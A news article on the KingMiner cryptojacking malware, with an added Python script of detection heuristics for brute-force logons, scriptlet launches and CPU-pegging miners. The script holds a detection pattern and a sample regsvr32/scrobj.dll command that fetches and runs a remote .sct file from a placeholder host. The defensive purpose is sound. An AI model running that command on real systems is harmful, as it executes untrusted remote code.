KingMiner malware hijacks the full power of Windows Server CPUs

Attack rates are rising and detection rates are falling.
Written by Charlie Osborne, Contributing Writer

Cryptojacking, the hijacking of PCs and servers to steal CPU time for covert cryptocurrency mining, is becoming a thorn in the side of individuals and businesses alike.

One in three organizations now says they've been targeted by cryptocurrency mining malware.

A university was recently forced to shut down its entire network to stop a cryptojacking attack, and Japan has issued the first prison sentence in the country's history in relation to a cryptojacking scheme.

Cryptojacking, which most often mines Monero (XMR) or Ethereum (ETH), can be difficult to detect when the miner is throttled to a modest share of CPU. Because mining proceeds flow to attacker-controlled wallets continuously, the technique is gaining ground with attackers who previously relied on ransomware, where a payout is never guaranteed.

On Thursday, researchers from Check Point said in a blog post that one such form of cryptomining malware, known as KingMiner, first appeared in June this year and is now out in the wild as a new-and-improved variant.

The malware generally targets Microsoft IIS and SQL Server installations, brute-forcing login credentials to gain access; the entry point is weak passwords rather than a software exploit. Once a login succeeds, a .sct Windows Scriptlet file is downloaded and executed on the victim's machine.

This script detects the CPU architecture of the machine and downloads a payload tailored to it. The payload is named as a .zip but is actually an XML file, which the researchers say is intended to "bypass emulation attempts."

It is worth noting that if older versions of the attack files are found on the victim machine, these files will be deleted by the new infection.


Once the payload is unpacked, it creates a set of new registry keys and launches an XMRig miner binary configured to mine Monero.

The miner is configured to use 75 percent of CPU capacity but, possibly because of a coding error, actually drives the CPU to 100 percent.
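The chain described above (credential brute-forcing against IIS/SQL Server, a downloaded .sct scriptlet, then a miner pinning the CPU) implies three things a defender can check for. The following Python script is an added illustration, not code from Check Point's report or from the malware: it runs brute-force, scriptlet-launch and CPU-pegging heuristics over constructed sample data embedded in the script. The assumption that the scriptlet is launched through regsvr32 with scrobj.dll, the process name "winlogn.exe", the IP addresses, and the "max-cpu-usage" key (taken from older XMRig config.json layouts) are all assumptions made here; the article does not state them.

```python
"""Hunting heuristics for a KingMiner-style intrusion on Windows Server.

Added example; not Check Point's analysis code or the malware's. All inputs
below are constructed for the example and embedded inline.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log export, one line per event:
# "<ISO time> <event id> <source ip> <target account>". 4625 = failed logon.
# The burst from 198.51.100.7 mimics a credential brute-force; 203.0.113.5
# is a user mistyping a password twice. IPs and times are made up.
FAILED_LOGONS = """\
2018-11-29T10:00:01 4625 198.51.100.7 sa
2018-11-29T10:00:02 4625 198.51.100.7 sa
2018-11-29T10:00:02 4625 198.51.100.7 administrator
2018-11-29T10:00:03 4625 198.51.100.7 sa
2018-11-29T10:00:04 4625 198.51.100.7 sa
2018-11-29T10:00:05 4625 198.51.100.7 sa
2018-11-29T10:00:06 4625 198.51.100.7 administrator
2018-11-29T10:00:07 4625 198.51.100.7 sa
2018-11-29T10:00:08 4625 198.51.100.7 sa
2018-11-29T10:00:09 4625 198.51.100.7 sa
2018-11-29T10:07:00 4625 203.0.113.5 jsmith
2018-11-29T10:09:00 4625 203.0.113.5 jsmith
"""


def brute_force_sources(log_text, threshold=10, window=timedelta(minutes=5)):
    """Source IPs with at least `threshold` failed logons inside any `window`.

    A sliding window over each source's sorted timestamps means a slow
    trickle of typos is not flagged, while a password-guessing burst is.
    """
    per_source = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] != "4625":
            continue
        per_source[parts[2]].append(datetime.fromisoformat(parts[0]))
    flagged = set()
    for src, stamps in per_source.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(src)
                break
    return flagged


# Assumption (not stated in the article): the .sct scriptlet is executed via
# regsvr32 loading scrobj.dll, the usual way Windows runs a remote scriptlet.
_SCT_REF = re.compile(r"\.sct\b", re.IGNORECASE)


def is_scriptlet_launch(cmdline):
    """True if a process command line references a .sct file or uses
    regsvr32 with scrobj.dll to run one."""
    cl = cmdline.lower()
    return bool(_SCT_REF.search(cl)) or ("regsvr32" in cl and "scrobj.dll" in cl)


# Constructed per-process CPU samples (percent of total CPU), one dict per
# sampling interval. Sample 1 is a legitimate SQL Server spike; from sample 2
# an unknown process (name chosen here to resemble winlogon.exe) pins the CPU.
CPU_SAMPLES = [
    {"sqlservr.exe": 90.0, "w3wp.exe": 5.0, "svchost.exe": 1.0},
    {"sqlservr.exe": 1.0, "w3wp.exe": 1.0, "svchost.exe": 0.0, "winlogn.exe": 97.0},
    {"sqlservr.exe": 2.0, "w3wp.exe": 1.0, "svchost.exe": 0.0, "winlogn.exe": 96.0},
    {"sqlservr.exe": 1.0, "w3wp.exe": 2.0, "svchost.exe": 0.0, "winlogn.exe": 97.0},
]


def pegged_processes(samples, min_pct=95.0, min_samples=3):
    """Names of processes at or above `min_pct` in every one of the last
    `min_samples` samples. Requiring sustained load filters out bursts."""
    recent = samples[-min_samples:]
    if len(recent) < min_samples:
        return []
    present_in_all = set.intersection(*(set(s) for s in recent))
    return sorted(n for n in present_in_all if all(s[n] >= min_pct for s in recent))


def exceeds_configured_cap(config_text, observed_pct):
    """Compare an XMRig-style config's CPU cap with observed usage; returns the
    excess in percentage points (0 when within cap). Key name is an assumption
    based on older XMRig config.json layouts."""
    cap = float(json.loads(config_text).get("max-cpu-usage", 100))
    return max(0.0, observed_pct - cap)


if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(FAILED_LOGONS))
    print("scriptlet launch:", is_scriptlet_launch(
        "regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll"))
    print("pegged processes:", pegged_processes(CPU_SAMPLES))
    print("over cap by:", exceeds_configured_cap('{"max-cpu-usage": 75}', 100.0))
```

On a live server the same logic would be fed from the Security event log (Event ID 4625, or SQL Server's own login-failure events), from process command lines, and from a few minutes of per-process CPU samples; the thresholds are starting points to tune against a host's normal load.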

To make tracking and attribution harder, KingMiner's mining pool is private and its API has been turned off. The wallet has never appeared in public mining pools, so the researchers cannot tell which domains are in use or how many Monero coins the attacks have mined.


However, Check Point has tracked "widespread" infections from Mexico to India, and Norway to Israel.

The new version of KingMiner is being deployed with two other variants, and the malware's operators appear to be continually improving the malware -- with a particular focus on avoiding emulation and detection.


"The attacker employs various evasion techniques to bypass emulation and detection methods, and, as a result, several detection engines have noted significantly reduced detection rates," the cybersecurity firm says. "Based on our analysis of sensor logs, there is a steady rise in the number of KingMiner attack attempts."

Check Point also notes a vast array of placeholders in KingMiner's code, reserved for future updates, and so the malware may become a more prevalent threat in the future.
